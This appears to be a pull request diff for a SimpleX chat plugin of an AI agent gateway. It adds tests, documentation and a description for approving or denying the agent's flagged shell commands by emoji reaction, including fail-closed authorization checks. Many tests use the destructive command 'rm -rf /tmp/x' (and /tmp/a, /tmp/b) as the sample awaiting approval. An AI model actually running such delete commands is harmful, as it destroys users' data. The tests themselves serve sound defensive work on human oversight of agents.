+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    await adapter._handle_event(
+        _reaction_event("✅", chat_info={"type": "group", "groupInfo": {"groupId": 7}})
+    )
+    assert calls == []
+    assert adapter._approval_prompts_by_item
+
+
+def test_group_chat_ref_requires_a_numeric_id():
+    """Group refs get the same numeric validation contact refs already get."""
+    assert SimplexAdapter._chat_ref("group:7") == "#7"
+    assert SimplexAdapter._chat_ref("group:friends") is None
+    assert SimplexAdapter._chat_ref("group:") is None
+
+
+# ---------------------------------------------------------------------------
+# 11c. Resolving a tap
+# ---------------------------------------------------------------------------
 
 
 @pytest.mark.asyncio
@@ -737,50 +1090,6 @@ async def test_removing_a_reaction_does_not_resolve(resolved_approvals):
 
 
 @pytest.mark.asyncio
-async def test_reaction_from_another_contact_is_ignored(resolved_approvals):
-    """Fail closed: only the contact whose DM raised the approval may answer."""
-    calls, _state = resolved_approvals
-    adapter, _sent = _approval_adapter()
-    await adapter.send_exec_approval(
-        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
-    )
-    await _drain(adapter)
-
-    await adapter._handle_event(_reaction_event("✅", contact_id=99))
-    assert calls == []
-    assert adapter._approval_prompts_by_item  # still pending
-
-
-@pytest.mark.asyncio
-async def test_group_reaction_requires_the_allowlist(monkeypatch, resolved_approvals):
-    calls, _state = resolved_approvals
-    monkeypatch.setenv("SIMPLEX_GROUP_ALLOWED", "7")
-    monkeypatch.setenv("SIMPLEX_ALLOWED_USERS", "member-a")
-    adapter, sent = _approval_adapter()
-    await adapter.send_exec_approval(
-        chat_id="group:7", command="rm -rf /tmp/x", session_key="s",
-        description="delete",
-    )
-    await _drain(adapter)
-    assert _reaction_commands(sent)[0].startswith("/_reaction #7 501 on ")
-
-    outsider = _reaction_event(
-        "✅", dir_type="groupRcv",
-        member={"memberId": "member-b", "localDisplayName": "mallory"},
-    )
-    await adapter._handle_event(outsider)
-    assert calls == []
-
-    insider = _reaction_event(
-        "✅", dir_type="groupRcv",
-        member={"memberId": "member-a", "localDisplayName": "alice"},
-    )
-    await adapter._handle_event(insider)
-    await _drain(adapter)
-    assert calls == [("s", "once")]
-
-
-@pytest.mark.asyncio
 async def test_unmapped_reaction_explains_itself_once(resolved_approvals):
     calls, _state = resolved_approvals
     adapter, _sent = _approval_adapter()
@@ -799,6 +1108,34 @@ async def test_unmapped_reaction_explains_itself_once(resolved_approvals):
 
 
 @pytest.mark.asyncio
+async def test_a_tier_the_prompt_did_not_offer_is_refused(resolved_approvals):
+    """The emoji map is global; the offer is per-prompt.
+
+    ❤ is not seeded on a prompt that disallows the permanent tier, but the
+    user can still place it by hand — and core would have refused it, so
+    acknowledging "approved permanently" would be a lie told by a security UI.
+    """
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42",
+        command="rm -rf /tmp/x",
+        session_key="s",
+        description="delete",
+        allow_permanent=False,
+    )
+    await _drain(adapter)
+    adapter._ws.send.reset_mock()
+
+    await adapter._handle_event(_reaction_event("❤"))
+    await _drain(adapter)
+
+    assert calls == []
+    assert "not one of the approval options" in "\n".join(_ws_texts(adapter))
+    assert "permanent" not in "\n".join(_ws_texts(adapter))
+
+
+@pytest.mark.asyncio
 async def test_stale_tap_is_told_the_command_did_not_run(resolved_approvals):
     """resolve returning 0 means the queue was already drained (#63501)."""
     calls, state = resolved_approvals
@@ -814,7 +1151,7 @@ async def test_stale_tap_is_told_the_command_did_not_run(resolved_approvals):
     await _drain(adapter)
 
     assert calls == [("s", "once")]
-    reply = json.loads(adapter._ws.send.call_args[0][0])["cmd"]
+    reply = "\n".join(_ws_texts(adapter))
     assert "no longer pending" in reply
     assert "Approved" not in reply
 
@@ -835,24 +1172,168 @@ async def test_expired_prompt_is_retired_without_resolving(resolved_approvals):
 
     assert calls == []
     assert adapter._approval_prompts_by_item == {}
-    assert "expired" in json.loads(adapter._ws.send.call_args[0][0])["cmd"]
+    assert "expired" in "\n".join(_ws_texts(adapter))
 
 
 @pytest.mark.asyncio
-async def test_new_prompt_for_a_session_evicts_the_previous_one():
-    """Single-flight per session, same as the Matrix adapter."""
-    adapter, _sent = _approval_adapter(item_id=501)
+async def test_expiry_notice_is_not_a_stranger_operated_megaphone(
+    resolved_approvals,
+):
+    """Authorization runs before expiry, so an outsider cannot make us post."""
+    calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+    adapter._approval_prompts_by_item["501"].expires_at = 0.0
+    adapter._ws.send.reset_mock()
+
+    await adapter._handle_event(_reaction_event("✅", contact_id=99))
+    await _drain(adapter)
+
+    assert calls == []
+    assert adapter._ws.send.call_count == 0
+    assert adapter._approval_prompts_by_item  # untouched by the outsider
+
+
+@pytest.mark.asyncio
+async def test_malformed_reaction_payload_is_ignored():
+    """A type guard has to run before the access it guards, not after."""
+    adapter, _sent = _approval_adapter()
+
+    await adapter._handle_reaction_event(
+        {"type": "chatItemReaction", "added": True, "reaction": ["not-a-dict"]}
+    )
+    await adapter._handle_reaction_event(
+        {"type": "chatItemReaction", "added": True, "reaction": {
+            "chatReaction": ["not-a-dict"]
+        }}
+    )
+
+
+# ---------------------------------------------------------------------------
+# 11d. Seeding and degradation
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.asyncio
+async def test_exec_approval_degrades_when_daemon_rejects_reactions():
+    """A daemon that refuses reactions leaves the typed flow, not a broken one."""
+    adapter, sent = _approval_adapter(
+        reaction_response={"type": "chatCmdError", "chatError": {}}
+    )
+
+    first = await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/a", session_key="s1", description="delete"
+    )
+    await _drain(adapter)
+
+    assert first.success is True
+    assert adapter._reactions_supported is False
+    # Exactly one attempt, then it stops trying.
+    assert len(_reaction_commands(sent)) == 1
+    assert "/approve" in "\n".join(_ws_texts(adapter))
+
+    sent.clear()
+    adapter._ws.send.reset_mock()
+    second = await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/b", session_key="s2", description="delete"
+    )
+    await _drain(adapter)
+
+    assert second.success is True
+    # No further seeding attempts, and nothing advertised that is not there.
+    assert _reaction_commands(sent) == []
+    assert "tap a reaction" not in _prompt_text(sent)
+    assert "/approve" in _prompt_text(sent)
+
+
+@pytest.mark.asyncio
+async def test_seed_rejection_keeps_the_inbound_reaction_lane(resolved_approvals):
+    """'The bot may not react' and 'the user may not react' are not the same.
+
+    A daemon that refuses the bot's own reactions has said nothing about a
+    reaction the user places, so the prompt stays anchored and registered.
+    """
+    calls, _state = resolved_approvals
+    adapter, sent = _approval_adapter(
+        reaction_response={"type": "chatCmdError", "chatError": {}}
+    )
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/a", session_key="s1", description="delete"
+    )
+    await _drain(adapter)
+    assert adapter._reactions_supported is False
+
+    adapter._next_item_id = 777
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/b", session_key="s2", description="delete"
+    )
+    await _drain(adapter)
+
+    assert "777" in adapter._approval_prompts_by_item
+    await adapter._handle_event(_reaction_event("✅", item_id=777))
+    await _drain(adapter)
+    assert calls == [("s2", "once")]
+
+
+@pytest.mark.asyncio
+async def test_one_refused_emoji_does_not_kill_the_whole_lane():
+    """Only a rejection of the first, always-valid emoji means 'no reactions'.
+
+    ✅ is on the daemon's own allowlist, so a rejection there is about
+    reactions in general. A rejection further down the list is about that one
+    emoji and must not disable the feature process-wide.
+    """
+    adapter, sent = _approval_adapter(reject_emoji="🚀")
+
     await adapter.send_exec_approval(
         chat_id="42", command="rm -rf /tmp/a", session_key="s", description="delete"
     )
     await _drain(adapter)
 
-    adapter2, _s2 = _approval_adapter(item_id=777)
-    adapter._send_command = adapter2._send_command
-    await adapter.send_exec_approval(
-        chat_id="42", command="rm -rf /tmp/b", session_key="s", description="delete"
+    assert adapter._reactions_supported is True
+    seeded = {_reaction_emoji(c) for c in _reaction_commands(sent)}
+    assert seeded == {"✅", "🚀", "❤", "👎"}
+    assert adapter._approval_prompts_by_item["501"].seeded_emoji == ["✅", "❤", "👎"]
+
+
+@pytest.mark.asyncio
+async def test_a_seed_that_lands_after_resolution_is_taken_back_off():
+    """No bot reaction may outlive the prompt it decorates.
+
+    A leftover ✅ on a resolved prompt is a live-looking tap target on a
+    message that can no longer answer for itself.
+    """
+    adapter, _sent = _approval_adapter()
+    prompt = _simplex._SimplexApprovalPrompt(
+        session_key="s",
+        chat_id="42",
+        chat_ref="@42",
+        item_id="501",
+        choices=frozenset({"once", "deny"}),
+        expires_at=time.monotonic() + 300,
     )
+    gate = asyncio.Event()
+    calls = []
+
+    async def fake_set_reaction(chat_ref, item_id, emoji, *, add=True):
+        calls.append((emoji, add))
+        if add:
+            await gate.wait()
+        return True
+
+    adapter._set_reaction = fake_set_reaction
+    task = asyncio.create_task(
+        adapter._seed_approval_reactions(prompt, _choice_table()[:1])
+    )
+    await asyncio.sleep(0)
+
+    adapter._retire_prompt(prompt)
+    gate.set()
+    await task
     await _drain(adapter)
 
-    assert list(adapter._approval_prompts_by_item) == ["777"]
-    assert adapter._approval_prompt_by_session == {"s": "777"}
+    assert ("✅", False) in calls
+    assert prompt.seeded_emoji == []

--- a/tests/gateway/test_simplex_plugin.py
+++ b/tests/gateway/test_simplex_plugin.py
@@ -674,7 +674,9 @@ async def test_exec_approval_text_only_when_chat_id_is_a_display_name():
     assert result.success is True
     assert sent == []  # never touched /_send or /_reaction
     frame = json.loads(adapter._ws.send.call_args[0][0])
-    assert frame["cmd"].startswith("@alice ")
+    # send() moved to the structured form on main — display-name chats are
+    # addressed as ``/_send @<name> json [...]`` now, not bare ``@name text``.
+    assert frame["cmd"].startswith("/_send @alice json ")
     assert "tap a reaction" not in frame["cmd"]
     assert "/approve" in frame["cmd"]
 

--- a/tests/gateway/test_simplex_plugin.py
+++ b/tests/gateway/test_simplex_plugin.py
@@ -674,9 +674,15 @@ async def test_exec_approval_text_only_when_chat_id_is_a_display_name():
     assert result.success is True
     assert sent == []  # never touched /_send or /_reaction
     frame = json.loads(adapter._ws.send.call_args[0][0])
-    # send() moved to the structured form on main — display-name chats are
-    # addressed as ``/_send @<name> json [...]`` now, not bare ``@name text``.
-    assert frame["cmd"].startswith("/_send @alice json ")
+    # Deliberately the BARE form. The daemon rejects the structured
+    # ``/_send @<name> json …`` for display-name-addressed chats
+    # (``commandError: Failed reading: empty``, verified live against
+    # v7.0.0.11 on 2026-08-09), so the approval flow composes the bare
+    # chat command itself rather than delegating to ``send()``, whose
+    # unconditional structured form would lose the message outright.
+    # This assertion is the guard: if it starts failing, the fallback
+    # lane regressed to a form the daemon refuses.
+    assert frame["cmd"].startswith("@alice ")
     assert "tap a reaction" not in frame["cmd"]
     assert "/approve" in frame["cmd"]
 

--- a/website/docs/user-guide/messaging/simplex.md
+++ b/website/docs/user-guide/messaging/simplex.md
@@ -122,38 +122,62 @@ voice note (audio extensions) or a document.
 ## Exec approval
 
 When the agent wants to run a potentially dangerous command it asks first.
-The prompt shows the command, the reason, and the choices — and the bot
+The prompt always shows the command, the reason, and the typed commands
+that answer it: `/approve`, `/approve session`, `/approve always`, `/deny`.
+
+**In a direct chat**, when exactly one approval is waiting, the bot also
 pre-places the decision emoji on its own message so you can answer with a
 long-press and a tap instead of typing:
 
-- ✅ approve once
-- 🚀 approve for this session
-- ❤️ approve always (adds the pattern to the permanent allowlist)
-- 👎 deny
+| reaction | means |
+|---|---|
+| ✅ | approve once |
+| 🚀 | approve for this session |
+| ❤️ | approve always |
+| 👎 | deny |
+| 👍 | approve once (accepted, but not pre-placed) |
 
-Typing still works and is always offered in the prompt: `/approve`,
-`/approve session`, `/approve always`, `/deny`. Only the emoji above are
-recognised — the simplex-chat daemon accepts a fixed set of reaction emoji,
-so the tiers use what SimpleX actually allows rather than the icons other
-Hermes platforms use.
+Nothing else is recognised, and a reaction is only accepted for a tier the
+prompt actually offered — reacting ❤️ to a prompt that did not offer the
+permanent tier gets you a short reply, not a permanent approval. The emoji
+are not the ones other Hermes platforms use: the simplex-chat daemon
+validates reactions against a fixed set, so these are what SimpleX allows.
 
-Who may answer:
+❤️ **approve always** writes the command pattern into your permanent
+allowlist on disk. It applies to that pattern everywhere Hermes runs it —
+not just this chat and not just this platform. Use 🚀 if you only mean "for
+now".
 
-- **Direct chats** — the contact whose conversation raised the approval.
-  Nobody else can react in a DM, so no extra allowlist entry is needed and
-  DM pairing works as-is.
-- **Group chats** — the reacting member must appear in
-  `SIMPLEX_ALLOWED_USERS` (by member id or display name). With no allowlist
-  configured, group reactions are ignored and `/approve` is the way in.
+### When you get a typed prompt instead
 
-A prompt stays tappable for 5 minutes, matching the agent-side approval
-timeout. After that a tap gets an "expired" reply rather than silently
-doing nothing, and a tap that lands after the command was already answered
-is told the command did not run.
+The tap lane is only offered when a tap can mean exactly one thing. These
+cases fall back to typed commands, which the gateway authorizes in full:
 
-If your daemon is too old to accept reactions, the first attempt fails, the
-bot says so once, and every later prompt is plain text with the typed
-commands only — approvals keep working either way.
+- **Group chats.** Any member can react, and the identity the daemon
+  reports for a group reactor is not one this adapter can tie to a verified
+  operator, so v1 keeps reactions to direct chats.
+- **Two approvals at once in the same session.** `resolve_gateway_approval`
+  resolves a session's approvals oldest-first and cannot be pointed at a
+  specific one (upstream issue #64001), so a tap could not say *which*
+  command you meant. When a second approval arrives, the bot withdraws the
+  reactions from the first message, tells you it was superseded, and sends
+  the new prompt typed-only. Answer both with `/approve` or `/deny`. That
+  session keeps getting typed prompts until the approval window lapses —
+  answering by typing happens inside the gateway, so the adapter cannot see
+  that the queue drained.
+- **After a gateway restart.** Prompts live in memory. Reactions left on a
+  message from before a restart do nothing — type `/approve` instead.
+- **A daemon that will not let the bot place reactions.** The bot says so
+  once and stops pre-placing them; typed commands keep working, and a
+  reaction you place yourself is still read.
+
+`SIMPLEX_ALLOW_ALL_USERS` controls who may talk to the bot. It does not
+grant anyone the right to approve a command.
+
+A prompt stays tappable for as long as your `approvals.timeout` setting
+allows. After that a tap gets an "expired" reply rather than silently doing
+nothing, and a tap that lands after the command was already answered is
+told the command did not run.
 
 ## Using SimpleX with cron jobs
 

--- a/website/docs/user-guide/messaging/simplex.md
+++ b/website/docs/user-guide/messaging/simplex.md
@@ -119,6 +119,42 @@ Agent replies can also embed `MEDIA:/path/to/file` tags in plain text —
 the adapter strips the tag from the body and sends the file as either a
 voice note (audio extensions) or a document.
 
+## Exec approval
+
+When the agent wants to run a potentially dangerous command it asks first.
+The prompt shows the command, the reason, and the choices — and the bot
+pre-places the decision emoji on its own message so you can answer with a
+long-press and a tap instead of typing:
+
+- ✅ approve once
+- 🚀 approve for this session
+- ❤️ approve always (adds the pattern to the permanent allowlist)
+- 👎 deny
+
+Typing still works and is always offered in the prompt: `/approve`,
+`/approve session`, `/approve always`, `/deny`. Only the emoji above are
+recognised — the simplex-chat daemon accepts a fixed set of reaction emoji,
+so the tiers use what SimpleX actually allows rather than the icons other
+Hermes platforms use.
+
+Who may answer:
+
+- **Direct chats** — the contact whose conversation raised the approval.
+  Nobody else can react in a DM, so no extra allowlist entry is needed and
+  DM pairing works as-is.
+- **Group chats** — the reacting member must appear in
+  `SIMPLEX_ALLOWED_USERS` (by member id or display name). With no allowlist
+  configured, group reactions are ignored and `/approve` is the way in.
+
+A prompt stays tappable for 5 minutes, matching the agent-side approval
+timeout. After that a tap gets an "expired" reply rather than silently
+doing nothing, and a tap that lands after the command was already answered
+is told the command did not run.
+
+If your daemon is too old to accept reactions, the first attempt fails, the
+bot says so once, and every later prompt is plain text with the typed
+commands only — approvals keep working either way.
+
 ## Using SimpleX with cron jobs
 
 ```python

--- a/website/docs/user-guide/messaging/simplex.md
+++ b/website/docs/user-guide/messaging/simplex.md
@@ -126,16 +126,28 @@ The prompt always shows the command, the reason, and the typed commands
 that answer it: `/approve`, `/approve session`, `/approve always`, `/deny`.
 
 **In a direct chat**, when exactly one approval is waiting, the bot also
-pre-places the decision emoji on its own message so you can answer with a
-long-press and a tap instead of typing:
+pre-places three decision emoji on its own message so you can answer with a
+long-press and a tap instead of typing, then follows the prompt with a short
+line naming the taps it managed to place:
+
+| tap | means |
+|---|---|
+| 👎 | deny |
+| ✅ | approve once |
+| 🚀 | approve for this session |
+
+Three, not four, because the simplex-chat daemon holds at most **three
+reactions per sender per item** — a fourth comes back as "too many
+reactions". The limit is per sender, so it never stops you from adding your
+own reaction to a message the bot has already filled. 👎 is placed first, so
+if a slot is ever short it is never the refusal that goes missing.
+
+Two more reactions are read but never pre-placed:
 
 | reaction | means |
 |---|---|
-| ✅ | approve once |
-| 🚀 | approve for this session |
+| 👍 | approve once |
 | ❤️ | approve always |
-| 👎 | deny |
-| 👍 | approve once (accepted, but not pre-placed) |
 
 Nothing else is recognised, and a reaction is only accepted for a tier the
 prompt actually offered — reacting ❤️ to a prompt that did not offer the
@@ -143,10 +155,23 @@ permanent tier gets you a short reply, not a permanent approval. The emoji
 are not the ones other Hermes platforms use: the simplex-chat daemon
 validates reactions against a fixed set, so these are what SimpleX allows.
 
-❤️ **approve always** writes the command pattern into your permanent
-allowlist on disk. It applies to that pattern everywhere Hermes runs it —
-not just this chat and not just this platform. Use 🚀 if you only mean "for
-now".
+### "Approve always" is typed-only, on purpose
+
+**approve always** writes the command pattern into your permanent allowlist
+on disk. It applies to that pattern everywhere Hermes runs it — not just this
+chat, not just this platform, and not just today. That is the most
+consequential thing an approval prompt can do, so it costs a deliberate
+`/approve always` rather than one tap on an emoji sitting next to "deny".
+Taps are for the two decisions that expire on their own: this once, or this
+session.
+
+If you do want it as a reaction, ❤️ still resolves to approve-always when you
+place it yourself. It is simply never offered.
+
+The legend the bot posts under a prompt lists only the taps that are really
+on the message. If the daemon refused one, or the slots were full, the
+missing one is not advertised — you will never be told to tap something that
+is not there.
 
 ### When you get a typed prompt instead
 

--- a/website/docs/user-guide/messaging/simplex.md
+++ b/website/docs/user-guide/messaging/simplex.md
@@ -165,6 +165,11 @@ cases fall back to typed commands, which the gateway authorizes in full:
   session keeps getting typed prompts until the approval window lapses —
   answering by typing happens inside the gateway, so the adapter cannot see
   that the queue drained.
+- **A prompt that could not be delivered or anchored.** If the connection to
+  the daemon is down, the send fails, or the daemon never answers it, the
+  approval is still waiting inside the agent even though no tappable message
+  exists for it. That session gets typed prompts for one approval window,
+  rather than a tap that would answer the earlier command you never saw.
 - **After a gateway restart.** Prompts live in memory. Reactions left on a
   message from before a restart do nothing — type `/approve` instead.
 - **A daemon that will not let the bot place reactions.** The bot says so


### PR DESCRIPTION
## What does this PR do?

SimpleX users type `/approve` every time the agent hits a flagged command. Matrix users
tap an emoji. This adds tap-to-approve to SimpleX.

I hit this on my own install doing client work: typing `/approve` for every flagged
command is enough friction that the encrypted channel becomes the annoying one — the
opposite of why anyone picks SimpleX.

**Scope:** one plugin file (`plugins/platforms/simplex/adapter.py`), its tests, and its
doc page. No core edits, no new config keys, env vars, or dependencies. The daemon
behaviours this design depends on were measured against a live `simplex-chat` v7.0.0.11
daemon; two of the answers changed the design (see Live testing).

`gateway/run.py` duck-types `send_exec_approval` off the adapter class; SimpleX doesn't
define it, so approvals fall through to the generic plain-text prompt. The daemon
already exposes reactions (`/_reaction`, a `reactions` field on every chat item); the
adapter hadn't wired them up. The shape follows the tap-to-approve pattern in
`plugins/platforms/matrix/adapter.py` — from reading that handler, not running Matrix:
post the prompt, seed the decision emoji on it, resolve an inbound reaction through
`tools.approval.resolve_gateway_approval`.

**Why the tap lane is narrow.** `resolve_gateway_approval(session_key, choice)`
resolves a session's approvals oldest-first with no way to name one (#64001, open), so
a tap cannot say which command it meant. A tap is offered only when it can mean exactly
one thing:

- **Direct chats only** in v1. A group reactor's identity is a member id — a different
  namespace from the contact ids an allowlist holds. Groups get the typed prompt, which
  the gateway authorizes in full; group support needs member-identity semantics
  verified against a live daemon first.
- **One live approval per session.** A second approval withdraws the first prompt's
  reactions, says it was superseded, and goes out typed-only — as does every exit that
  ends without a tracked prompt, since `tools/approval` queues the approval before
  notifying the adapter. Two calls that interleave at the awaited prompt send are caught
  the same way: an in-flight marker sends the later entrant typed-only, and the earlier
  one withdraws its own prompt when it resumes and finds the queue grew under it. This state is per adapter instance, and that is a named residual:
  a recreated adapter loses the latch while core's queue survives, so a prompt sent just
  after an adapter restart can reopen the tap lane with older entries still queued. The
  preconditions are narrow (adapter recreation + a pending pile-up + a new approval inside
  the window); #64001's id-addressed resolve is the complete fix.
- Before resolving, the handler re-checks that the tapped prompt is still current, that
  the reaction arrived in the chat the prompt was posted in (in a DM that is the
  reactor's identity; a group-member payload on a DM prompt is refused), that it hasn't
  expired, and that the tier was one this prompt offered.

<details>
<summary>Protocol constraints that shaped the details</summary>

- The daemon validates reactions against a fixed set (`mrEmojiChar` in
  `src/Simplex/Chat/Protocol.hs` allows only `👍👎😀😂😢❤🚀✅`, bare U+2764), per
  `Char` — so the U+2764 U+FE0F heart most clients send fails. Inbound emoji are
  normalised by stripping variation selectors.
- A sender gets at most three reactions per item, so the seeded set is never more than
  three — 👎 deny, ✅ once, 🚀 session, in that order, deny first so a cap can only
  cost the last target — and fewer when the approval offers fewer tiers. ❤
  approve-always is honoured inbound but never seeded: "always" writes a permanent
  on-disk allowlist entry, and a deliberate typed `/approve always` is the right cost
  for that. 👍 is read inbound as approve-once. The prompt carries no legend; the
  seeding task posts one afterwards listing the emoji that actually landed.
- Every message this feature emits uses the structured `/_send <ref> json [...]` form.
  When this flow was built, `send()`'s DM text path composed `@<chat_id> <content>`,
  which the daemon resolves as a display-name lookup and silently drops (#46265).
  That fix has since landed on main (`eb048772f`) and this branch is rebased on top
  of it — with one caveat found in live re-testing: the daemon **rejects** the
  structured form for display-name-addressed chats (`/_send @<name> json …` →
  `commandError: Failed reading: empty`, v7.0.0.11), so the approval flow composes
  the bare form itself for those chats rather than delegating to `send()`. Ordinary
  DMs to display-name chats via core `send()` still hit that rejection — filed separately as #82648.
- Reaction support is feature-detected: an explicit `chatCmdError` on a seed downgrades
  to typed prompts and says so once; a timeout latches nothing; a display-name DM (no
  numeric `ChatRef`) stays typed. Typed `/approve` / `/deny` instructions are in the
  prompt body on every path. A tap that resolves nothing is told the command did not
  run rather than failing silently; an unusable reaction gets one explanation per
  prompt, not one per tap. Cleanup toggles the bot's own seeds off with the same
  `/_reaction` command, leaving the user's reaction visible.
- Authorization is the chat itself: in a DM the only party who can react is the contact
  that owns it — the same contact whose message raised the approval.
  `SIMPLEX_ALLOW_ALL_USERS` governs who may talk to the bot, never who may approve. DM
  pairing keeps working with no extra configuration. Unauthorized reactors are logged,
  not answered.

</details>

Two incidental hunks, both in this file: `_handle_event` binds `event.get("resp")` once
so the repo's `ty` checker can narrow the type, and `_send_command` now pops its
correlation-id entry in a `finally` — previously only the error paths popped it, so
every successful command leaked one `_pending_responses` entry. Happy to drop the first
if you'd rather keep this PR strictly to the feature.

## Related Issue

Related to #64001 (`resolve_gateway_approval` is FIFO and cannot target a specific
entry). Not a fix — this adapter works within the current FIFO resolve, and can drop
the single-pending restriction if that API grows an id parameter.

## Type of Change

- [x] ✨ New feature (non-breaking change that adds functionality)

## Changes Made

- `plugins/platforms/simplex/adapter.py` — `send_exec_approval` posts the prompt via
  `/_send` to get the daemon's `itemId` (plain `send()` returns no id), registers
  prompt state before seeding starts, seeds detached inside `run.py`'s 15s budget;
  `_handle_reaction_event` resolves; `_retire_prompt` is the single retirement path.
- `tests/gateway/test_simplex_plugin.py` — 67 tests (was 13); the first in this file to
  drive the inbound path.
- `website/docs/user-guide/messaging/simplex.md` — the exec-approval section.

## How to Test

1. `scripts/run_tests.sh tests/gateway/test_simplex_plugin.py` — 67 tests.
2. Point a gateway at a `simplex-chat` daemon, DM the bot something that triggers an
   approval, tap ✅: the command runs and the bot's seeded emoji come off the message.
3. Trigger two approvals in one session without answering the first: the first loses
   its reactions and says it was superseded, the second arrives typed-only, and a tap
   on the first runs nothing.

## Live testing

I probed a live `simplex-chat` v7.0.0.11 daemon on my own install to settle the
protocol questions this design bets on — hand-issued `/_reaction` and `/_send` commands
against a real daemon, not a mock, and not this branch end-to-end. Three answers, two
changed the code:

1. The daemon accepts the bot reacting to its own message — the premise the feature
   rests on, and it holds.
2. Reactions are capped at three per sender per item; a fourth answers
   `commandError: "too many reactions"`. It is a count cap, not an emoji filter. The
   original four-emoji seed set would have silently dropped its last entry — deny —
   leaving three approve-flavoured taps and no way to refuse. Hence three seeds, deny
   first.
3. The cap is per sender: the bot's three seeds and a human's ✅ coexisted on one item,
   so filling the bot's slots never blocks the user.

The same session surfaced the `send()` DM-text bug above (since fixed on main), by
watching a send report success while nothing reached the chat.

**The branch itself:** running on a v2026.8.3 install since 2026-08-04, through multiple
real approvals over three days of live use. The prompt arrives with its three seeded emoji, a
tap from a phone client resolves it, the acknowledgement comes back, and the bot's
seeds come off — leaving only the user's own reaction on the message. No surprises so
far.

Still unit-tested only: the deny and session tiers, the concurrent-approval guard,
expiry, the seed-refusal downgrade, group semantics, and behaviour across a gateway
restart. I'd value a report from anyone who exercises those.

## Checklist

### Code

- [x] I've read the Contributing Guide
- [x] My commit messages follow Conventional Commits
- [x] I searched existing PRs — closest prior art: #51998 (SimpleX receipt reactions
      plus the `send()` DM-format fix; no approval flow). No existing SimpleX approval PR.
- [x] Only changes related to this feature (plus the two hunks disclosed above)
- [ ] `pytest tests/ -q` all pass — `tests/gateway/`: 5023 passed, 10 failed, across
      six files (`test_discord_send`, `test_send_multiple_images`, `test_session_store_prune`,
      `test_telegram_media_read_timeout`, `test_wecom_callback`,
      `test_whatsapp_bridge_pidfile`). All six are untouched by this branch, and the
      same ten tests fail on current main under the same invocation — pre-existing.
- [x] I've added tests for my changes
- [x] Tested on my platform: Debian 13, Python 3.13 — unit tests, the protocol
      probing above, and the branch running live against a v7.0.0.11 daemon since
      2026-08-04 (see "The branch itself").

### Documentation & Housekeeping

- [x] `website/docs/user-guide/messaging/simplex.md` updated
- [x] No config keys, no env vars, no architecture changes;
      `check-windows-footguns.py --all` clean. Remaining items N/A.

## What I'd like a second pair of eyes on

The three-reaction cap and the self-reaction acceptance are measured on v7.0.0.11 only.
Both are handled defensively — a refusal downgrades to typing and says so; a full-slots
error just stops seeding — so a different daemon degrades rather than breaks. The cap
is detected from the daemon's message text (`"too many reactions"`) because the error
envelope varies between versions; if there is a stable structured field for that error
I'd rather match on it.
